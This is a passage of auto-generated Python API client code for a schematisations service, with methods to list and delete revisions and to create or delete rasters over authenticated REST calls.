>>> thread = api.schematisations_revisions_delete_with_http_info(id, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: A unique integer value identifying this revision. (required)
:param str schematisation_pk: (required)
:param DestroyRevision data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `schematisations_revisions_delete`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_delete`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{id}/', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_list(self, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_list # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_list(schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str schematisation_pk: (required)
:param float number:
:param str commit_message:
:param str commit_message__iexact:
:param str commit_message__contains:
:param str commit_message__icontains:
:param str commit_message__in: Multiple values may be separated by commas.
:param str commit_message__startswith:
:param str commit_message__istartswith:
:param str commit_message__endswith:
:param str commit_message__regex:
:param float schematisation__id:
:param str schematisation__slug:
:param str schematisation__slug__iexact:
:param str schematisation__slug__contains:
:param str schematisation__slug__icontains:
:param str schematisation__slug__in: Multiple values may be separated by commas.
:param str schematisation__slug__startswith:
:param str schematisation__slug__istartswith:
:param str schematisation__slug__endswith:
:param str schematisation__slug__regex:
:param str schematisation__owner__name:
:param str schematisation__owner__name__iexact:
:param str schematisation__owner__name__contains:
:param str schematisation__owner__name__icontains:
:param str schematisation__owner__name__in: Multiple values may be separated by commas.
:param str schematisation__owner__name__startswith:
:param str schematisation__owner__name__istartswith:
:param str schematisation__owner__name__endswith:
:param str schematisation__owner__name__regex:
:param str schematisation__owner__unique_id:
:param str schematisation__owner__unique_id__iexact:
:param str schematisation__owner__unique_id__contains:
:param str schematisation__owner__unique_id__icontains:
:param str schematisation__owner__unique_id__in: Multiple values may be separated by commas.
:param str schematisation__owner__unique_id__startswith:
:param str schematisation__owner__unique_id__istartswith:
:param str schematisation__owner__unique_id__endswith:
:param str schematisation__owner__unique_id__regex:
:param str commit_user__username:
:param str commit_user__username__iexact:
:param str commit_user__username__contains:
:param str commit_user__username__icontains:
:param str commit_user__username__in: Multiple values may be separated by commas.
:param str commit_user__username__startswith:
:param str commit_user__username__istartswith:
:param str commit_user__username__endswith:
:param str commit_user__username__regex:
:param str commit_date:
:param str commit_date__gt:
:param str commit_date__gte:
:param str commit_date__lt:
:param str commit_date__lte:
:param str commit_date__date:
:param str commit_date__date__gt:
:param str commit_date__date__gte:
:param str commit_date__date__lt:
:param str commit_date__date__lte:
:param float commit_date__year:
:param float commit_date__year__gt:
:param float commit_date__year__gte:
:param float commit_date__year__lt:
:param float commit_date__year__lte:
:param float commit_date__month:
:param float commit_date__month__lte:
:param float commit_date__day:
:param float commit_date__day__lt:
:param float commit_date__week:
:param float commit_date__week_day:
:param str committed:
:param str archived:
:param str is_valid:
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_list_with_http_info(schematisation_pk, **kwargs) # noqa: E501
def schematisations_revisions_list_with_http_info(self, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_list # noqa: E501
Manage revisions of schematisations. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_list_with_http_info(schematisation_pk, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str schematisation_pk: (required)
:param float number:
:param str commit_message:
:param str commit_message__iexact:
:param str commit_message__contains:
:param str commit_message__icontains:
:param str commit_message__in: Multiple values may be separated by commas.
:param str commit_message__startswith:
:param str commit_message__istartswith:
:param str commit_message__endswith:
:param str commit_message__regex:
:param float schematisation__id:
:param str schematisation__slug:
:param str schematisation__slug__iexact:
:param str schematisation__slug__contains:
:param str schematisation__slug__icontains:
:param str schematisation__slug__in: Multiple values may be separated by commas.
:param str schematisation__slug__startswith:
:param str schematisation__slug__istartswith:
:param str schematisation__slug__endswith:
:param str schematisation__slug__regex:
:param str schematisation__owner__name:
:param str schematisation__owner__name__iexact:
:param str schematisation__owner__name__contains:
:param str schematisation__owner__name__icontains:
:param str schematisation__owner__name__in: Multiple values may be separated by commas.
:param str schematisation__owner__name__startswith:
:param str schematisation__owner__name__istartswith:
:param str schematisation__owner__name__endswith:
:param str schematisation__owner__name__regex:
:param str schematisation__owner__unique_id:
:param str schematisation__owner__unique_id__iexact:
:param str schematisation__owner__unique_id__contains:
:param str schematisation__owner__unique_id__icontains:
:param str schematisation__owner__unique_id__in: Multiple values may be separated by commas.
:param str schematisation__owner__unique_id__startswith:
:param str schematisation__owner__unique_id__istartswith:
:param str schematisation__owner__unique_id__endswith:
:param str schematisation__owner__unique_id__regex:
:param str commit_user__username:
:param str commit_user__username__iexact:
:param str commit_user__username__contains:
:param str commit_user__username__icontains:
:param str commit_user__username__in: Multiple values may be separated by commas.
:param str commit_user__username__startswith:
:param str commit_user__username__istartswith:
:param str commit_user__username__endswith:
:param str commit_user__username__regex:
:param str commit_date:
:param str commit_date__gt:
:param str commit_date__gte:
:param str commit_date__lt:
:param str commit_date__lte:
:param str commit_date__date:
:param str commit_date__date__gt:
:param str commit_date__date__gte:
:param str commit_date__date__lt:
:param str commit_date__date__lte:
:param float commit_date__year:
:param float commit_date__year__gt:
:param float commit_date__year__gte:
:param float commit_date__year__lt:
:param float commit_date__year__lte:
:param float commit_date__month:
:param float commit_date__month__lte:
:param float commit_date__day:
:param float commit_date__day__lt:
:param float commit_date__week:
:param float commit_date__week_day:
:param str committed:
:param str archived:
:param str is_valid:
:param int limit: Number of results to return per page.
:param int offset: The initial index from which to return the results.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2001, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'schematisation_pk',
'number',
'commit_message',
'commit_message__iexact',
'commit_message__contains',
'commit_message__icontains',
'commit_message__in',
'commit_message__startswith',
'commit_message__istartswith',
'commit_message__endswith',
'commit_message__regex',
'schematisation__id',
'schematisation__slug',
'schematisation__slug__iexact',
'schematisation__slug__contains',
'schematisation__slug__icontains',
'schematisation__slug__in',
'schematisation__slug__startswith',
'schematisation__slug__istartswith',
'schematisation__slug__endswith',
'schematisation__slug__regex',
'schematisation__owner__name',
'schematisation__owner__name__iexact',
'schematisation__owner__name__contains',
'schematisation__owner__name__icontains',
'schematisation__owner__name__in',
'schematisation__owner__name__startswith',
'schematisation__owner__name__istartswith',
'schematisation__owner__name__endswith',
'schematisation__owner__name__regex',
'schematisation__owner__unique_id',
'schematisation__owner__unique_id__iexact',
'schematisation__owner__unique_id__contains',
'schematisation__owner__unique_id__icontains',
'schematisation__owner__unique_id__in',
'schematisation__owner__unique_id__startswith',
'schematisation__owner__unique_id__istartswith',
'schematisation__owner__unique_id__endswith',
'schematisation__owner__unique_id__regex',
'commit_user__username',
'commit_user__username__iexact',
'commit_user__username__contains',
'commit_user__username__icontains',
'commit_user__username__in',
'commit_user__username__startswith',
'commit_user__username__istartswith',
'commit_user__username__endswith',
'commit_user__username__regex',
'commit_date',
'commit_date__gt',
'commit_date__gte',
'commit_date__lt',
'commit_date__lte',
'commit_date__date',
'commit_date__date__gt',
'commit_date__date__gte',
'commit_date__date__lt',
'commit_date__date__lte',
'commit_date__year',
'commit_date__year__gt',
'commit_date__year__gte',
'commit_date__year__lt',
'commit_date__year__lte',
'commit_date__month',
'commit_date__month__lte',
'commit_date__day',
'commit_date__day__lt',
'commit_date__week',
'commit_date__week_day',
'committed',
'archived',
'is_valid',
'limit',
'offset'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
if 'number' in local_var_params and local_var_params['number'] is not None: # noqa: E501
query_params.append(('number', local_var_params['number'])) # noqa: E501
if 'commit_message' in local_var_params and local_var_params['commit_message'] is not None: # noqa: E501
query_params.append(('commit_message', local_var_params['commit_message'])) # noqa: E501
if 'commit_message__iexact' in local_var_params and local_var_params['commit_message__iexact'] is not None: # noqa: E501
query_params.append(('commit_message__iexact', local_var_params['commit_message__iexact'])) # noqa: E501
if 'commit_message__contains' in local_var_params and local_var_params['commit_message__contains'] is not None: # noqa: E501
query_params.append(('commit_message__contains', local_var_params['commit_message__contains'])) # noqa: E501
if 'commit_message__icontains' in local_var_params and local_var_params['commit_message__icontains'] is not None: # noqa: E501
query_params.append(('commit_message__icontains', local_var_params['commit_message__icontains'])) # noqa: E501
if 'commit_message__in' in local_var_params and local_var_params['commit_message__in'] is not None: # noqa: E501
query_params.append(('commit_message__in', local_var_params['commit_message__in'])) # noqa: E501
if 'commit_message__startswith' in local_var_params and local_var_params['commit_message__startswith'] is not None: # noqa: E501
query_params.append(('commit_message__startswith', local_var_params['commit_message__startswith'])) # noqa: E501
if 'commit_message__istartswith' in local_var_params and local_var_params['commit_message__istartswith'] is not None: # noqa: E501
query_params.append(('commit_message__istartswith', local_var_params['commit_message__istartswith'])) # noqa: E501
if 'commit_message__endswith' in local_var_params and local_var_params['commit_message__endswith'] is not None: # noqa: E501
query_params.append(('commit_message__endswith', local_var_params['commit_message__endswith'])) # noqa: E501
if 'commit_message__regex' in local_var_params and local_var_params['commit_message__regex'] is not None: # noqa: E501
query_params.append(('commit_message__regex', local_var_params['commit_message__regex'])) # noqa: E501
if 'schematisation__id' in local_var_params and local_var_params['schematisation__id'] is not None: # noqa: E501
query_params.append(('schematisation__id', local_var_params['schematisation__id'])) # noqa: E501
if 'schematisation__slug' in local_var_params and local_var_params['schematisation__slug'] is not None: # noqa: E501
query_params.append(('schematisation__slug', local_var_params['schematisation__slug'])) # noqa: E501
if 'schematisation__slug__iexact' in local_var_params and local_var_params['schematisation__slug__iexact'] is not None: # noqa: E501
query_params.append(('schematisation__slug__iexact', local_var_params['schematisation__slug__iexact'])) # noqa: E501
if 'schematisation__slug__contains' in local_var_params and local_var_params['schematisation__slug__contains'] is not None: # noqa: E501
query_params.append(('schematisation__slug__contains', local_var_params['schematisation__slug__contains'])) # noqa: E501
if 'schematisation__slug__icontains' in local_var_params and local_var_params['schematisation__slug__icontains'] is not None: # noqa: E501
query_params.append(('schematisation__slug__icontains', local_var_params['schematisation__slug__icontains'])) # noqa: E501
if 'schematisation__slug__in' in local_var_params and local_var_params['schematisation__slug__in'] is not None: # noqa: E501
query_params.append(('schematisation__slug__in', local_var_params['schematisation__slug__in'])) # noqa: E501
if 'schematisation__slug__startswith' in local_var_params and local_var_params['schematisation__slug__startswith'] is not None: # noqa: E501
query_params.append(('schematisation__slug__startswith', local_var_params['schematisation__slug__startswith'])) # noqa: E501
if 'schematisation__slug__istartswith' in local_var_params and local_var_params['schematisation__slug__istartswith'] is not None: # noqa: E501
query_params.append(('schematisation__slug__istartswith', local_var_params['schematisation__slug__istartswith'])) # noqa: E501
if 'schematisation__slug__endswith' in local_var_params and local_var_params['schematisation__slug__endswith'] is not None: # noqa: E501
query_params.append(('schematisation__slug__endswith', local_var_params['schematisation__slug__endswith'])) # noqa: E501
if 'schematisation__slug__regex' in local_var_params and local_var_params['schematisation__slug__regex'] is not None: # noqa: E501
query_params.append(('schematisation__slug__regex', local_var_params['schematisation__slug__regex'])) # noqa: E501
if 'schematisation__owner__name' in local_var_params and local_var_params['schematisation__owner__name'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name', local_var_params['schematisation__owner__name'])) # noqa: E501
if 'schematisation__owner__name__iexact' in local_var_params and local_var_params['schematisation__owner__name__iexact'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__iexact', local_var_params['schematisation__owner__name__iexact'])) # noqa: E501
if 'schematisation__owner__name__contains' in local_var_params and local_var_params['schematisation__owner__name__contains'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__contains', local_var_params['schematisation__owner__name__contains'])) # noqa: E501
if 'schematisation__owner__name__icontains' in local_var_params and local_var_params['schematisation__owner__name__icontains'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__icontains', local_var_params['schematisation__owner__name__icontains'])) # noqa: E501
if 'schematisation__owner__name__in' in local_var_params and local_var_params['schematisation__owner__name__in'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__in', local_var_params['schematisation__owner__name__in'])) # noqa: E501
if 'schematisation__owner__name__startswith' in local_var_params and local_var_params['schematisation__owner__name__startswith'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__startswith', local_var_params['schematisation__owner__name__startswith'])) # noqa: E501
if 'schematisation__owner__name__istartswith' in local_var_params and local_var_params['schematisation__owner__name__istartswith'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__istartswith', local_var_params['schematisation__owner__name__istartswith'])) # noqa: E501
if 'schematisation__owner__name__endswith' in local_var_params and local_var_params['schematisation__owner__name__endswith'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__endswith', local_var_params['schematisation__owner__name__endswith'])) # noqa: E501
if 'schematisation__owner__name__regex' in local_var_params and local_var_params['schematisation__owner__name__regex'] is not None: # noqa: E501
query_params.append(('schematisation__owner__name__regex', local_var_params['schematisation__owner__name__regex'])) # noqa: E501
if 'schematisation__owner__unique_id' in local_var_params and local_var_params['schematisation__owner__unique_id'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id', local_var_params['schematisation__owner__unique_id'])) # noqa: E501
if 'schematisation__owner__unique_id__iexact' in local_var_params and local_var_params['schematisation__owner__unique_id__iexact'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__iexact', local_var_params['schematisation__owner__unique_id__iexact'])) # noqa: E501
if 'schematisation__owner__unique_id__contains' in local_var_params and local_var_params['schematisation__owner__unique_id__contains'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__contains', local_var_params['schematisation__owner__unique_id__contains'])) # noqa: E501
if 'schematisation__owner__unique_id__icontains' in local_var_params and local_var_params['schematisation__owner__unique_id__icontains'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__icontains', local_var_params['schematisation__owner__unique_id__icontains'])) # noqa: E501
if 'schematisation__owner__unique_id__in' in local_var_params and local_var_params['schematisation__owner__unique_id__in'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__in', local_var_params['schematisation__owner__unique_id__in'])) # noqa: E501
if 'schematisation__owner__unique_id__startswith' in local_var_params and local_var_params['schematisation__owner__unique_id__startswith'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__startswith', local_var_params['schematisation__owner__unique_id__startswith'])) # noqa: E501
if 'schematisation__owner__unique_id__istartswith' in local_var_params and local_var_params['schematisation__owner__unique_id__istartswith'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__istartswith', local_var_params['schematisation__owner__unique_id__istartswith'])) # noqa: E501
if 'schematisation__owner__unique_id__endswith' in local_var_params and local_var_params['schematisation__owner__unique_id__endswith'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__endswith', local_var_params['schematisation__owner__unique_id__endswith'])) # noqa: E501
if 'schematisation__owner__unique_id__regex' in local_var_params and local_var_params['schematisation__owner__unique_id__regex'] is not None: # noqa: E501
query_params.append(('schematisation__owner__unique_id__regex', local_var_params['schematisation__owner__unique_id__regex'])) # noqa: E501
if 'commit_user__username' in local_var_params and local_var_params['commit_user__username'] is not None: # noqa: E501
query_params.append(('commit_user__username', local_var_params['commit_user__username'])) # noqa: E501
if 'commit_user__username__iexact' in local_var_params and local_var_params['commit_user__username__iexact'] is not None: # noqa: E501
query_params.append(('commit_user__username__iexact', local_var_params['commit_user__username__iexact'])) # noqa: E501
if 'commit_user__username__contains' in local_var_params and local_var_params['commit_user__username__contains'] is not None: # noqa: E501
query_params.append(('commit_user__username__contains', local_var_params['commit_user__username__contains'])) # noqa: E501
if 'commit_user__username__icontains' in local_var_params and local_var_params['commit_user__username__icontains'] is not None: # noqa: E501
query_params.append(('commit_user__username__icontains', local_var_params['commit_user__username__icontains'])) # noqa: E501
if 'commit_user__username__in' in local_var_params and local_var_params['commit_user__username__in'] is not None: # noqa: E501
query_params.append(('commit_user__username__in', local_var_params['commit_user__username__in'])) # noqa: E501
if 'commit_user__username__startswith' in local_var_params and local_var_params['commit_user__username__startswith'] is not None: # noqa: E501
query_params.append(('commit_user__username__startswith', local_var_params['commit_user__username__startswith'])) # noqa: E501
if 'commit_user__username__istartswith' in local_var_params and local_var_params['commit_user__username__istartswith'] is not None: # noqa: E501
query_params.append(('commit_user__username__istartswith', local_var_params['commit_user__username__istartswith'])) # noqa: E501
if 'commit_user__username__endswith' in local_var_params and local_var_params['commit_user__username__endswith'] is not None: # noqa: E501
query_params.append(('commit_user__username__endswith', local_var_params['commit_user__username__endswith'])) # noqa: E501
if 'commit_user__username__regex' in local_var_params and local_var_params['commit_user__username__regex'] is not None: # noqa: E501
query_params.append(('commit_user__username__regex', local_var_params['commit_user__username__regex'])) # noqa: E501
if 'commit_date' in local_var_params and local_var_params['commit_date'] is not None: # noqa: E501
query_params.append(('commit_date', local_var_params['commit_date'])) # noqa: E501
if 'commit_date__gt' in local_var_params and local_var_params['commit_date__gt'] is not None: # noqa: E501
query_params.append(('commit_date__gt', local_var_params['commit_date__gt'])) # noqa: E501
if 'commit_date__gte' in local_var_params and local_var_params['commit_date__gte'] is not None: # noqa: E501
query_params.append(('commit_date__gte', local_var_params['commit_date__gte'])) # noqa: E501
if 'commit_date__lt' in local_var_params and local_var_params['commit_date__lt'] is not None: # noqa: E501
query_params.append(('commit_date__lt', local_var_params['commit_date__lt'])) # noqa: E501
if 'commit_date__lte' in local_var_params and local_var_params['commit_date__lte'] is not None: # noqa: E501
query_params.append(('commit_date__lte', local_var_params['commit_date__lte'])) # noqa: E501
if 'commit_date__date' in local_var_params and local_var_params['commit_date__date'] is not None: # noqa: E501
query_params.append(('commit_date__date', local_var_params['commit_date__date'])) # noqa: E501
if 'commit_date__date__gt' in local_var_params and local_var_params['commit_date__date__gt'] is not None: # noqa: E501
query_params.append(('commit_date__date__gt', local_var_params['commit_date__date__gt'])) # noqa: E501
if 'commit_date__date__gte' in local_var_params and local_var_params['commit_date__date__gte'] is not None: # noqa: E501
query_params.append(('commit_date__date__gte', local_var_params['commit_date__date__gte'])) # noqa: E501
if 'commit_date__date__lt' in local_var_params and local_var_params['commit_date__date__lt'] is not None: # noqa: E501
query_params.append(('commit_date__date__lt', local_var_params['commit_date__date__lt'])) # noqa: E501
if 'commit_date__date__lte' in local_var_params and local_var_params['commit_date__date__lte'] is not None: # noqa: E501
query_params.append(('commit_date__date__lte', local_var_params['commit_date__date__lte'])) # noqa: E501
if 'commit_date__year' in local_var_params and local_var_params['commit_date__year'] is not None: # noqa: E501
query_params.append(('commit_date__year', local_var_params['commit_date__year'])) # noqa: E501
if 'commit_date__year__gt' in local_var_params and local_var_params['commit_date__year__gt'] is not None: # noqa: E501
query_params.append(('commit_date__year__gt', local_var_params['commit_date__year__gt'])) # noqa: E501
if 'commit_date__year__gte' in local_var_params and local_var_params['commit_date__year__gte'] is not None: # noqa: E501
query_params.append(('commit_date__year__gte', local_var_params['commit_date__year__gte'])) # noqa: E501
if 'commit_date__year__lt' in local_var_params and local_var_params['commit_date__year__lt'] is not None: # noqa: E501
query_params.append(('commit_date__year__lt', local_var_params['commit_date__year__lt'])) # noqa: E501
if 'commit_date__year__lte' in local_var_params and local_var_params['commit_date__year__lte'] is not None: # noqa: E501
query_params.append(('commit_date__year__lte', local_var_params['commit_date__year__lte'])) # noqa: E501
if 'commit_date__month' in local_var_params and local_var_params['commit_date__month'] is not None: # noqa: E501
query_params.append(('commit_date__month', local_var_params['commit_date__month'])) # noqa: E501
if 'commit_date__month__lte' in local_var_params and local_var_params['commit_date__month__lte'] is not None: # noqa: E501
query_params.append(('commit_date__month__lte', local_var_params['commit_date__month__lte'])) # noqa: E501
if 'commit_date__day' in local_var_params and local_var_params['commit_date__day'] is not None: # noqa: E501
query_params.append(('commit_date__day', local_var_params['commit_date__day'])) # noqa: E501
if 'commit_date__day__lt' in local_var_params and local_var_params['commit_date__day__lt'] is not None: # noqa: E501
query_params.append(('commit_date__day__lt', local_var_params['commit_date__day__lt'])) # noqa: E501
if 'commit_date__week' in local_var_params and local_var_params['commit_date__week'] is not None: # noqa: E501
query_params.append(('commit_date__week', local_var_params['commit_date__week'])) # noqa: E501
if 'commit_date__week_day' in local_var_params and local_var_params['commit_date__week_day'] is not None: # noqa: E501
query_params.append(('commit_date__week_day', local_var_params['commit_date__week_day'])) # noqa: E501
if 'committed' in local_var_params and local_var_params['committed'] is not None: # noqa: E501
query_params.append(('committed', local_var_params['committed'])) # noqa: E501
if 'archived' in local_var_params and local_var_params['archived'] is not None: # noqa: E501
query_params.append(('archived', local_var_params['archived'])) # noqa: E501
if 'is_valid' in local_var_params and local_var_params['is_valid'] is not None: # noqa: E501
query_params.append(('is_valid', local_var_params['is_valid'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'offset' in local_var_params and local_var_params['offset'] is not None: # noqa: E501
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2001', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_rasters_create(self, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""Endpoint for creating a raster linked to a revision. # noqa: E501
Every raster type can be created/uploaded only once. Optional md5sum can be added to detect if the file already has been uploaded and automatically perform de-duplication. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_create(revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RasterCreate data: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: RevisionRaster
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.schematisations_revisions_rasters_create_with_http_info(revision_pk, schematisation_pk, data, **kwargs) # noqa: E501
def schematisations_revisions_rasters_create_with_http_info(self, revision_pk, schematisation_pk, data, **kwargs): # noqa: E501
"""Endpoint for creating a raster linked to a revision. # noqa: E501
Every raster type can be created/uploaded only once. Optional md5sum can be added to detect if the file already has been uploaded and automatically perform de-duplication. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.schematisations_revisions_rasters_create_with_http_info(revision_pk, schematisation_pk, data, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str revision_pk: (required)
:param str schematisation_pk: (required)
:param RasterCreate data: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(RevisionRaster, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'revision_pk',
'schematisation_pk',
'data'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method schematisations_revisions_rasters_create" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'revision_pk' is set
if self.api_client.client_side_validation and ('revision_pk' not in local_var_params or # noqa: E501
local_var_params['revision_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `revision_pk` when calling `schematisations_revisions_rasters_create`") # noqa: E501
# verify the required parameter 'schematisation_pk' is set
if self.api_client.client_side_validation and ('schematisation_pk' not in local_var_params or # noqa: E501
local_var_params['schematisation_pk'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `schematisation_pk` when calling `schematisations_revisions_rasters_create`") # noqa: E501
# verify the required parameter 'data' is set
if self.api_client.client_side_validation and ('data' not in local_var_params or # noqa: E501
local_var_params['data'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `data` when calling `schematisations_revisions_rasters_create`") # noqa: E501
collection_formats = {}
path_params = {}
if 'revision_pk' in local_var_params:
path_params['revision_pk'] = local_var_params['revision_pk'] # noqa: E501
if 'schematisation_pk' in local_var_params:
path_params['schematisation_pk'] = local_var_params['schematisation_pk'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'data' in local_var_params:
body_params = local_var_params['data']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/v3-beta/schematisations/{schematisation_pk}/revisions/{revision_pk}/rasters/', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RevisionRaster', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def schematisations_revisions_rasters_delete(self, id, revision_pk, schematisation_pk, **kwargs): # noqa: E501
"""schematisations_revisions_rasters_delete # noqa: E501
This method makes a synchronous HTTP request by default. To make an
